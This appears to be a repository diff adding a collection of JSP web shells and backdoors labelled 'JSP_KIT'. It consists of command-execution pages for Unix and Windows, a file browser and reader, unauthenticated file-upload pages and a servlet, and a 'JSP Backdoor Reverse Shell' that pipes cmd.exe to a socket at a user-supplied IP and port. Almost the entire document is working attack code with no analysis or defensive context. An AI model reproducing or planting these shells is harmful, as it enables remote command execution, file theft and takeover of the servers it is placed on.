jsp/hackk8/jsp2/UpServlet.class Normal file
View File

Binary file not shown.

71
jsp/hackk8/jsp2/UpServlet.java Normal file
View File

@@ -0,0 +1,71 @@
/*
* UpServlet.java 29/04/2005
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class UpServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<br><form method=\"POST\" action=\"\" enctype=\"multipart/form-data\">");
out.print("UPLOAD <input type=\"file\" name=\"file\" size=\"60\">");
out.print("<input type=\"submit\" value=\"Upload\">");
out.print("</form>");
out.print("</body></html>");
}
public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
String tag = new String();
int c = '\0';
int contador = 0;
ServletInputStream in = req.getInputStream();
DataInputStream post = new DataInputStream(in);
PrintWriter out = res.getWriter();
res.setContentType("text/html");
out.print("<pre>");
while((c=post.read()) != -1 && c != '\r' && c != '\n') {
tag=tag.concat("" + (char)c);
contador++;
}
for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
// (!) Uploaded File Name
File newfile = new File("c:\\install.log");
/////////////////////////
FileOutputStream fileout = new FileOutputStream(newfile);
for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
c=post.read();
fileout.write((char)c);
}
fileout.close();
out.print("<== OK");
}
public String getServletInfo() {
return "UpServlet 0.1";
}
}

1802
jsp/hackk8/jsp2/browser.jsp Normal file
View File

File diff suppressed because it is too large Load Diff

35
jsp/hackk8/jsp2/cmd.jsp Normal file
View File

@@ -0,0 +1,35 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>

32
jsp/hackk8/jsp2/cmdjsp.jsp Normal file
View File

@@ -0,0 +1,32 @@
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
<!-- http://michaeldaw.org 2006 -->

91
jsp/hackk8/jsp2/jsp-reverse.jsp Normal file
View File

@@ -0,0 +1,91 @@
// backdoor.jsp
// http://www.security.org.sg/code/jspreverse.html
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>
<!-- http://michaeldaw.org 2006 -->

77
jsp/hackk8/jsp2/list.jsp Normal file
View File

@@ -0,0 +1,77 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// list.jsp = Directory & File View
//
// by: Sierra
// modified: 27/06/2003
//
%>
<%
if(request.getParameter("file")==null) {
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<%
}
%>
<% //read the file name.
try {
File f = new File(request.getParameter("file"));
if(f.isDirectory()) {
int i;
String fname = new String("Unknown");
String fcolor = new String("Black");
%>
<HTML><BODY>
<FONT Face="Courier New, Helvetica" Color="Black">
<%
out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
File flist[] = f.listFiles();
for(i=0; i<flist.length; i++) {
fname = new String( flist[i].toString());
out.print("(");
if(flist[i].isDirectory() == true) {
out.print("d");
fname = fname + "/";
fcolor = new String("Blue");
} else if( flist[i].isFile() == true ) {
out.print("-");
fcolor = new String("Green");
} else {
out.print("?");
fcolor = new String("Red");
}
if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
}
%>
</FONT></BODY></HTML>
<%
} else {
if(f.canRead() == true) {
InputStream in = new FileInputStream(f);
ServletOutputStream outs = response.getOutputStream();
int left = 0;
try {
while((left) >= 0 ) {
left = in.read();
outs.write(left);
}
} catch(IOException ex) {ex.printStackTrace();}
outs.flush();
outs.close();
in.close();
} else {
out.print("Can't Read file<BR>");
}
}
} catch(Exception ex) {ex.printStackTrace();}
%>

162
jsp/hackk8/jsp2/up.jsp Normal file
View File

@@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "/tmp/";
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>

31
jsp/hackk8/jsp2/win32/cmd_win32.jsp Normal file
View File

@@ -0,0 +1,31 @@
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine(); }
}
%>
</pre>
</BODY></HTML>

162
jsp/hackk8/jsp2/win32/up_win32.jsp Normal file
View File

@@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "c:\\";
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>